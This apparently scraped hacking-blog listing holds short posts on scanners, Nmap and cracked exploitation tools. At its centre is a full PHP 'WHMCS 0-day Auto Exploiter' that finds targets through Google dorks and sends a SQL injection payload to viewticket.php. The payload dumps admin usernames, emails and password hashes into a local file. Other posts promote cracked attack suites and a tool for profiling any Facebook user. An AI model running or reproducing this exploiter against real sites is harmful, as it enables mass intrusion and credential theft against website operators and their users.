NMAP (Network Mapping) Cheat Sheet

Nmap (Network Mapping) Cheat Sheet. It is a very famous port scanner available for free. It is not just only a port scanner, it also do various jobs like banner grabbing, OS fingerprinting, Nmap script scanning, evading firewalls, etc. So we are gonna show you some important commands of Nmap.

Step 1: Open up the console and type nmap
It will give you the whole commands of Nmap. But we are here to understanding the commands so we should go ahead.

Here is the cheatsheet of NMAP.

READ MORE »

[PHP] WHMCS 0-day Auto Exploiter <= 5.2.8

<?php
/*
*****************************************************
  WHMCS 0day Auto Exploiter <= 5.2.8
  Coded by g00n - Skype: t3hg00n
   wwww.xploiter.net
*****************************************************
Preview:
http://i.imgur.com/qB726Gm.png
In action:
http://i.imgur.com/oNpZAf6.png
http://i.imgur.com/gFlBjtD.png
*****************************************************
*/

set_time_limit(0);
ini_set('memory_limit', '64M');
header('Content-Type: text/html; charset=UTF-8');
function letItBy(){ ob_flush(); flush(); }
function getAlexa($url)
{
 $xml = simplexml_load_file('http://data.alexa.com/data?cli=10&dat=snbamz&url='.$url);
 $rank1 = $xml->SD[1];
 if($rank1)
  $rank = $rank1->POPULARITY->attributes()->TEXT;
 else
  $rank = 0;
 return $rank;
}
 
function google_that($query, $page=1)
{
 $resultPerPage=8;
 $start = $page*$resultPerPage;
 $url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw&rsz={$resultPerPage}&start={$start}&q=" . urlencode($query);
 $resultFromGoogle = json_decode( http_get($url, true) ,true);
 if(isset($resultFromGoogle['responseStatus'])) {
  if($resultFromGoogle['responseStatus'] != '200') return false;
  if(sizeof($resultFromGoogle['responseData']['results']) == 0) return false;
  else return $resultFromGoogle['responseData']['results'];
 }
 else
  die('The function <b>' . __FUNCTION__ . '</b> Kill me :( <br>' . $url );
}
 
function http_get($url, $safemode = false){
 if($safemode === true) sleep(1);
 $im = curl_init($url);
 curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
 curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
 curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
 curl_setopt($im, CURLOPT_HEADER, 0);
 return curl_exec($im);
 curl_close();
}

function check_vuln($url) {
$url = dirname($url) . '/viewticket.php';
$url = str_replace("/admin","",$url);

$post = "tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,(SELECT GROUP_CONCAT(0x3a3a3a3a3a,id,0x3a,username,0x3a,email,0x3a,password,0x3a3a3a3a3a) FROM tbladmins),0,0,0,0,0,0,0,0,0,0,0#";
$curl_connection = curl_init($url);
if($curl_connection != false) {
 curl_setopt($curl_connection, CURLOPT_CONNECTTIMEOUT, 30);
 curl_setopt($curl_connection, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
 curl_setopt($curl_connection, CURLOPT_RETURNTRANSFER, true);
 curl_setopt($curl_connection, CURLOPT_SSL_VERIFYPEER, false);
 curl_setopt($curl_connection, CURLOPT_FOLLOWLOCATION, 1);
 curl_setopt($curl_connection, CURLOPT_POSTFIELDS, $post);
 $source = curl_exec($curl_connection);
 preg_match_all('/:::::(.*?):::::/s',$source,$infoz);
 if($infoz[0]) {
  return $infoz[0];
 }
 else
  return "Fail!";
}
else
 return "Fail!";
}
?>
<html>
<head>
<title>WHMCS Auto Xploiter - by g00n</title>
</head>
<body style="background-image: url('http://i.imgur.com/zHNCk2e.gif'); background-repeat: repeat; background-position: center; background-attachment: fixed;">

<STYLE>
textarea{background-color:#105700;color:lime;font-weight:bold;font-size: 20px;font-family: Tahoma; border: 1px solid #000000;}
input{FONT-WEIGHT:normal;background-color: #105700;font-size: 15px;font-weight:bold;color: lime; font-family: Tahoma; border: 1px solid #666666;height:20}
body {
font-family: Tahoma
}
tr {
BORDER: dashed 1px #333;
color: #FFF;
}
td {
BORDER: dashed 1px #333;
color: #FFF;
}
.table1 {
BORDER: 0px Black;
BACKGROUND-COLOR: Black;
color: #FFF;
}
.td1 {
BORDER: 0px;
BORDER-COLOR: #333333;
font: 7pt Verdana;
color: Green;
}
.tr1 {
BORDER: 0px;
BORDER-COLOR: #333333;
color: #FFF;
}
table {
BORDER: dashed 1px #333;
BORDER-COLOR: #333333;
BACKGROUND-COLOR: Black;
color: #FFF;
}
input {
border   : dashed 1px;
border-color  : #333;
BACKGROUND-COLOR: Black;
font: 8pt Verdana;
color: Red;
}
select {
BORDER-RIGHT:  Black 1px solid;
BORDER-TOP:    #DF0000 1px solid;
BORDER-LEFT:   #DF0000 1px solid;
BORDER-BOTTOM: Black 1px solid;
BORDER-color: #FFF;
BACKGROUND-COLOR: Black;
font: 8pt Verdana;
color: Red;
}
submit {
BORDER:  buttonhighlight 2px outset;
BACKGROUND-COLOR: Black;
width: 30%;
color: #FFF;
}
textarea {
border   : dashed 1px #333;
BACKGROUND-COLOR: Black;
font: Fixedsys bold;
color: #999;
}
BODY {
 SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
margin: 1px;
color: Red;
background-color: Black;
}
.main {
margin   : -287px 0px 0px -490px;
BORDER: dashed 1px #333;
BORDER-COLOR: #333333;
}
.tt {
background-color: Black;
}

A:link {
 COLOR: White; TEXT-DECORATION: none
}
A:visited {
 COLOR: White; TEXT-DECORATION: none
}
A:hover {
 color: Red; TEXT-DECORATION: none
}
A:active {
 color: Red; TEXT-DECORATION: none
}

#result{margin:10px;}
#result span{display:block;}
#result .Y{background-color:green;}
#result .X{background-color:red;}
</STYLE>
<script language=\'javascript\'>
function hide_div(id)
{
  document.getElementById(id).style.display = \'none\';
  document.cookie=id+\'=0;\';
}
function show_div(id)
{
  document.getElementById(id).style.display = \'block\';
  document.cookie=id+\'=1;\';
}
function change_divst(id)
{
  if (document.getElementById(id).style.display == \'none\')
    show_div(id);
  else
    hide_div(id);
}
</script>
</td></table></tr>
<br>
<br>
<link rel="stylesheet" type="text/css" href="http://fonts.googleapis.com/css?family=Audiowide">
    <style>
      body {
        font-family: 'Audiowide', serif;
        font-size: 30px;
  
      }
    </style>
  </head>

  <body onLoad="type_text()" ; bgColor=#000000 text=#00FFFF background="Fashion fuchsia">
    <center>
<font face="Audiowide" color="red">WHMCS Auto Xploiter <font color="green">(0day)</font>
<br>
<font color="white" size="4">[For WHMCS ver. <= </font><font color="green" size="4">5.2.8</font><font color="white" size="4">]</font>
</font>
<br><br>

<table border=1 bordercolor=red>
<tr>
<td width="700">
<br />
<center>
 <form method="post">
  Google Dork:   
  <input type="text" id="dork" size="30" name="dork" value="<?php echo (isset($_POST['dork']{0})) ? htmlentities($_POST['dork']) : 'inurl:submitticket.php'; ?>" />
    <input type="submit" value="Xploit!" id="button"/>
 </form>
<?php
 if(isset($_POST['dork']{0})) {
  $file = fopen("WMCS-Hashes.txt","a");
  echo '<br /><div id="result"><b>Scanning has been started... Good luck! ;)</b><br><br>';   
  letItBy();   
  for($googlePage = 1; $googlePage <= 50; $googlePage++) {
   $googleResult = google_that($_POST['dork'], $googlePage);
   if(!$googleResult) {
    echo 'Finished scanning.';
    fclose($file);
    break;
   }
   
   for($victim = 0; $victim < sizeof($googleResult); $victim++){
    $result = check_vuln($googleResult[$victim]['unescapedUrl']);
    $alexa = getAlexa($googleResult[$victim]['unescapedUrl']);
    if($result != "Fail!") {
     $hashes = "";
     foreach ($result as $record) {
      $hashes = $hashes . str_replace(':::::','',$record) . "\n";
     }
     $sep = "========================================================\n";
     $data = $sep . $googleResult[$victim]['unescapedUrl'] . " - Alexa: " .$alexa. "\n" . $sep . $hashes . "\n";
     fwrite($file,$data);
     echo "<br /><font color=\"green\">Successfully Xploited...</font>";
     echo '<span class="Y">';
     echo "<pre>" . $data . "</pre></span><br />";
     
    }
    else {
    echo '<span class="X">';
    echo "<a href=\"{$googleResult[$victim]['unescapedUrl']}\" target='_blank'>{$googleResult[$victim]['titleNoFormatting']}</a> - <font color=\"black\">Failed!</font>";
    echo "</span>\n<br />";
    }
    letItBy();
   }
  }
  echo '</div>';
 }
?>
</center>
</td>
</table>
<br /><br />
<font face="Audiowide" color="red" size="2">
Coded by: <font color="white">g00n</font> <font color="white">|</font> Skype: <font color="white"><a href="Skype:t3hg00n">t3hg00n</a></font><br /><br />
<br > <font color="green">For more tools/scripts/exploits/etc.</font>
<br />visit <a href="http://xploiter.net" target="_blank" style="text-decoration: none;">www.Xploiter.net</a>
</font>

</center>
</body>
</html>

Source: http://pastebin.com/cuikqkhA

Project Amaterasu Release 1

The script consist of 10 Most used Tools by Hackers and Pentesters.
2 Private scripts , 1 - Subdomain scanner , 2- Ftp Brute forcer.

it is release 1 , In next list , it will contain up 5 private scripts diff from this.
in Final , it will have all Private scripts plus my own coded scripts :)
READ MORE »

How Read Barrecode Or Qr Code Without A Scanner

Did you encounter once QR code and want to read it and you do not have a smart phone? Once you need to know numbers bar code, but you do not have a scanner codes? price that is used in commercial purposes.

READ MORE »

Blocking Automated Scanners Against Your Website

Blocking Automated Scanners Against Your Website.

Credits: Cyberb0y.

We all know that there has been a vast development in automated vulnerability scanners. There are countless private , public , free commercial automated web vulnerability scanners. And since they are available all over the internet so it has become a easy thing for anyone to find out vulnerability in your website by running automated scanner against your website. And that results in problems for the webmasters. Even if the vulnerability is not detected but it affects the website as any automated scanner send numerous request to the website in order to conduct the vulnerability scan. And thereby the website gets affected in terms of the bandwidth or if any vulnerability is found it might get exploited. So better make an arrangement before to stop people using automated scanners on your website.

READ MORE »

WappeX v 2.0 Cracked - Full Version

WappeX aka Web Application Exploiter is a Multi Vulnerability Scanning + Exploiting tool .
It contains all Hacking tool / Exploiting Tool for pentesting the Website via SQL Injection.

Team Has added the  Havij also , one of the most Used Hacking tool .
Wappex is Completely a Package of Hacking tool. 

READ MORE »

WAppEx1.0 + Crack (Web Application Exploiter + Crack)

Download Link is at the bottom of this post ^_^

Home page: http://www.itsecteam.com/products/web-application-exploiter-wappex/

READ MORE »

[J2TeaM] Facebook Information v2.0

Main GUI

Scan information about Personal User

Scan information about Fan Page

Auto detect input is User or Fan Page

Facebook Information <version 2.0>
Home page: http://junookyo.blogspot.com/

About:
+ Facebook Information is a simple tool for check information about anyone.

READ MORE »

[J2TeaM] Facebook Information v1.0

Main GUI

Scan information about Personal User

Scan information about Fan Page

Auto detect input is User or Fan Page

Facebook Information <version 1.0>
Home page: http://junookyo.blogspot.com/

About:
+ Facebook Information is a simple tool for check information about anyone.

READ MORE »

Get vBulletin Version v2.0

Get vBulletin Version <version 2.0>
Home page: http://junookyo.blogspot.com/

Download:

http://juno-okyo.googlecode.com/files/Get%20vBulletin%20Version%202.0.rar

SHA1 Checksum:

56f66b06150343ce30cf33d9b71c43e23d5fbbac

About:
+ Get version of any vBulletin Forum.
+ Aero interface, easy to use and friendly.
+ Scan from: HTML Meta Generator; Cascade Style Sheets; Javascript.

READ MORE »

REAL SQL - V0.3 (SQLi Finder)

Here comes a post after a long holidays from blogging due to my exams. This is about one of my favs SQli scanner. Its called Real SQLi. Just found this so thought of posting here.
What is does is search through Google, using Google Dorks and tries each website for an SQL Injection Vulnerability and if it is successful it will return the vulnerable link to you!
This is the main GUI of the application and in later screenshots I will show you it's features.

READ MORE »

Online SQLi Scanner

Online SQLi scanner is the best thing you need when you are out of your private hacking room. So here is one more Online SQLi scanner i found today so sharing with you people. 

Its right here - http://www.poomplacedorm.com/hyde.php

Nmap 6.25 released with 85 new NSE scripts

After five months NMAP team release latest version of open source utility for network exploration or security auditing - NMAP 6.25 .

It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X.

Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.

READ MORE »

CodeXploiter 1.0 - Tìm kiếm các lỗ hổng trong các file PHP

CodeXploiter is a White-Box scanner used for finding vulnerabilities in PHP files. It scans PHP source code files automatically based on selected rules and configurations.
CodeXploiter helps security professionals to highlight possible vulnerabilities in a timely manner by automating the process of source code analysis. As a result this will let security professionals focus more on vulnerability research and exploit development.
CodeXploiter has a user-friendly interface that suits the needs of security professionals and average users who are interested in the field of vulnerability research and exploit development.

READ MORE »

Xcode multiple vulnerability Scanner

XCode Exploit – Vulnurable & webshell Scanner help you to gather the dorks Link from Google. then you may check the results if its Vulnurable to exploit with SQL injection commands, LFI,and XSS. And You may hunt the webshells those uploaded.

READ MORE »

Owasp Xelenium - XSS Scanner

XSS scanner, Xelenium. It is a nice security testing tool that can be used to test and find security vulnerabilities in websites and web applications. Xelenium uses the open source functional test automation tool 'Selenium' as its engine and has been built using Java swing. 

READ MORE »

Smart Hunter v.1.4.3 Public Version

 

Download : http://adf.ly/FRrSF

Fierce Domain Scan

Written by RSnake with input from id, Vacuum and Robert E Lee. A special thanks to IceShaman to porting it to use multi-threading.
Fierce domain scan was born out of personal frustration after performing a web application security audit. It is traditionally very difficult to discover large swaths of a corporate network that is non-contiguous. It's terribly easy to run a scanner against an IP range, but if the IP ranges are nowhere near one another you can miss huge chunks of networks.
READ MORE »